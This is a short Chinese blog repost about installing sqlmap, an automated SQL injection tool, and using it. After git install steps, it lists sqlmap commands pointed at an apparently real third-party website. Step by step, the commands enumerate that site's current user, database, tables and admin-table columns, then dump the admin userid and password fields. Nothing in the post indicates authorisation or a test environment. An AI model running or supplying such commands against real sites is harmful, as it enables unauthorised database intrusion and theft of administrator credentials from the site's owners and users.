码迷,mamicode.com
首页 > 数据库 > 详细

sqlmap安装与简单使用

时间:2015-02-03 14:48:35      阅读:171      评论:0      收藏:0      [点我收藏+]

标签:

简单介绍下sqlmap吧,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。

1、yum install git

2、git clone https://github.com/sqlmapproject/sqlmap.git

3、cd sqlmap

4、

/*  注解:获取当前用户名称

sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user

 /*当前数据库

sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db

sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"

sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost"

/*获取字段里面的内容

sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0    

sqlmap安装与简单使用

标签:

原文地址:http://www.cnblogs.com/LoveJulin/p/4269707.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!